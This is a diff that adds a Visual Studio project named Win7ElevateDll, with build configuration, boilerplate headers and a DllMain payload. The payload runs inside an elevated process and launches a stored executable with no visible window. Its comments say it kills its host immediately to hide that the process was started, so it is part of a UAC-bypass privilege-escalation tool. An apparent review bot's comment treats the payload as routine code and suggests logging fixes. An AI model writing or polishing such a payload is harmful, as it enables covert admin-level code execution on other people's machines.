<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)32</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)64</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)32</TargetName>
<GenerateManifest>false</GenerateManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)64</TargetName>
<GenerateManifest>false</GenerateManifest>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MinSpace</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MinSpace</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
<BuildLog>
<Path>
</Path>
</BuildLog>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="stdafx.h" />
<ClInclude Include="targetver.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="..\CMMN.cpp" />
<ClCompile Include="dllmain.cpp">
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
</PrecompiledHeader>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
</PrecompiledHeader>
</ClCompile>
<ClCompile Include="stdafx.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
</ClCompile>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>


@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClInclude Include="stdafx.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="targetver.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ClCompile Include="stdafx.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="dllmain.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="..\CMMN.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
</Project>


@ -0,0 +1,3 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
</Project>


@ -0,0 +1,57 @@
#include "stdafx.h"
#include <stdio.h>
#include ".\..\CMMN.h"
#include <stdlib.h>
#include <string>
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
//
// Simple stub code that is used to create EXE within a alevated process.
// Wee need to hide fact that we've started process thats why we immediately
// Terminate host application.
//
CLogger::LogLine(TEXT("DLL: Hello"));
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
//
// Obtaining TIOR path to be used for CreateProcess call
//
std::wstring cmd;
CInterprocessStorage::GetString( TEXT("w7e_TIORPath"), cmd );
STARTUPINFO startupInfo = {0};
startupInfo.cb = sizeof(startupInfo);
PROCESS_INFORMATION processInfo = {0};
CLogger::LogLine(TEXT("DLL: TIOR shell="));
CLogger::LogLine(cmd);
//
// Create not visible window
//
if (CreateProcess(cmd.c_str(), NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW * 1, NULL, NULL, &startupInfo, &processInfo))
{
CloseHandle(processInfo.hProcess);
CloseHandle(processInfo.hThread);
}
ExitProcess(-69);
}
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
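Review bot: The block comment at the top of `DllMain` does not say that the host process is terminated unconditionally. `ExitProcess(-69)` runs on every `DLL_PROCESS_ATTACH`, including when `cmd` is still empty after `GetString` or when `CreateProcess` returns FALSE, and neither case is logged. I would add `// Host always exits here with status (UINT)-69 = 0xFFFFFFBB, whether or not CreateProcess succeeded.` above the `ExitProcess` call, since that exit status is what anyone triaging the host's termination will see. `CLogger::LogLine(TEXT("DLL: Hello"))` sits before the `switch`, so it also runs for the thread attach/detach and process detach notifications.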


@ -0,0 +1,8 @@
// stdafx.cpp : source file that includes just the standard includes
// Win7ElevateDll.pch will be the pre-compiled header
// stdafx.obj will contain the pre-compiled type information
#include "stdafx.h"
// TODO: reference any additional headers you need in STDAFX.H
// and not in this file


@ -0,0 +1,17 @@
// stdafx.h : include file for standard system include files,
// or project specific include files that are used frequently, but
// are changed infrequently
//
#pragma once
#include "targetver.h"
#define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
// Windows Header Files:
#include <windows.h>
// TODO: reference additional headers your program requires here
#include <assert.h>


@ -0,0 +1,8 @@
#pragma once
// Including SDKDDKVer.h defines the highest available Windows platform.
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
#include <SDKDDKVer.h>


@ -0,0 +1,17 @@
// stdafx.h : include file for standard system include files,
// or project specific include files that are used frequently, but
// are changed infrequently
//
#pragma once
#include "targetver.h"
#define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
// Windows Header Files:
#include <windows.h>
// TODO: reference additional headers your program requires here
#include <assert.h>


@ -0,0 +1,8 @@
#pragma once
// Including SDKDDKVer.h defines the highest available Windows platform.
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
#include <SDKDDKVer.h>